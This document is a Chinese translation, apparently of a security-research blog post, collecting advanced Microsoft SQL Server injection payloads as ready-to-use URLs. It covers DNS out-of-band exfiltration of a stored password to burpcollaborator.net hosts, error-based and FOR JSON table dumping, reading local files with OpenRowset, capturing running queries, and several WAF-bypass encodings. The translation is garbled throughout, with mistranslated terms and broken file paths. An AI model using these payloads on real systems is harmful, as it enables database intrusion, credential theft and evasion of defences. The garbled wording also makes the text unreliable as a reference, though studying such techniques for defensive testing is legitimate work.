tl;dr
本文列举了几种改良的 MSSQL 注入技巧,所有的攻打向量都至多在三个最新版本的 Microsoft SQL Server 上进行了测试:2019、2017、2016SP2。
DNS Out-of-Band
如果遇到带有禁用堆栈查问的齐全盲 SQL 注入,则能够通过函数 fn_xe_file_target_read_file, fn_get_audit_file, 和 fn_trace_gettable 实现 DNS 带外 (OOB) 数据泄露。
利用 fn_xe_file_target_read_file()的例子:
https://vuln.app/getItem?id= 1+and+exists(select+*+from+fn_xe_file_target_read_file('C:*.xel',''%2b(select+pass+from+users+where+id=1)%2b'.064edw6l0h153w39ricodvyzuq0ood.burpcollaborator.net1.xem',null,null))
权限: 须要管制服务器权限。
fn_trace_gettable()例子:
https://vuln.app/ getItem?id=1+and+exists(select+*+from+fn_trace_gettable(''%2b(select+pass+from+users+where+id=1)%2b'.ng71njg8a4bsdjdw15mbni8m4da6yv.burpcollaborator.net1.trc',default))
权限: 须要管制服务器权限。
Alternative Error-Based vectors
基于谬误的 SQL 注入通常相似于 «+AND+1=@@version–»
等构造,以及基于 «OR»
操作符的变体。蕴含此类表达式的查问通常会被 WAF 阻止。为了绕过,能够应用 %2b 字符将字符串与特定函数调用的后果连接起来,该函数调用会在须要的数据上触发数据类型转换谬误。
特定函数的例子:
SUSER_NAME()
USER_NAME()
PERMISSIONS()
DB_NAME()
FILE_NAME()
TYPE_NAME()
COL_NAME()
USER_NAME(): 的例子
https://vuln.app/getItem?id=1'%2buser_name(@@version)--
疾速利用:在一个查问中检索整个表
有两种简略的办法能够在一个查问中检索表的全部内容 - 应用 FOR XML 或 FOR JSON 子句。FOR XML 子句须要指定的模式,如«raw»,因而 JSON 比拟简洁。
从以后数据库检索架构、表和列的查问:
https://vuln.app/getItem?id=-1'+union+select+null,concat_ws(0x3a,table_schema,table_name,column_name),null+from+information_schema.columns+for+json+auto--
基于谬误的攻打向量须要别名或名称,因为没有别名或名称的表达式的输入不能格式化为 JSON。
https://vuln.app/getItem?id=1'+and+1=(select+concat_ws(0x3a,table_schema,table_name,column_name)a+from+information_schema.columns+for+json+auto)--
Reading local files
应用 OpenRowset()函数检索本地文件 C:Windowswin.ini
的例子:
https://vuln.app/getItem?id=-1+union+select+null,(select+x+from+OpenRowset(BULK+’C:Windowswin.ini’,SINGLE_CLOB)+R(x)),null,null
基于谬误的 payload
https://vuln.app/getItem?id=1+and+1=(select+x+from+OpenRowset(BULK+'C:Windowswin.ini',SINGLE_CLOB)+R(x))--
权限:BULK 选项须要“ADMINISTER BULK OPERATIONS”或“ADMINISTER DATABASE BULK OPERATIONS”权限。
检索以后查问
能够从 Access sys.dm_exec_Requests
和sys.dm_exec_sql_text
中检索以后正在执行的 SQL 查问:
https://vuln.app/getItem?id=-1%20union%20select%20null,(select+text+from+sys.dm_exec_requests+cross+apply+sys.dm_exec_sql_text(sql_handle)),null,null
权限:如果 user 在服务器上领有 VIEW SERVER STATE
权限,则用户将看到 SQL Server 实例上正在执行的所有会话;否则,user 将仅看到以后会话。
绕过 WAF 的小技巧
一些特殊字符 %C2%85 или %C2%A0:
https://vuln.app/getItem?id=1%C2%85union%C2%85select%C2%A0null,@@version,null--
迷信 (0E) 和十六进制 (0x) 表示法:
https://vuln.app/getItem?id=0eunion+select+null,@@version,null--
https://vuln.app/getItem?id=0xunion+select+null,@@version,null--
在 From 和列名之间应用句号代替空格:
https://vuln.app/getItem?id=1+union+select+null,@@version,null+from.users--
N 分隔符:
https://vuln.app/getItem?id=0xunion+selectNnull,@@version,null+from+users--
原文:https://swarm.ptsecurity.com/advanced-mssql-injection-tricks/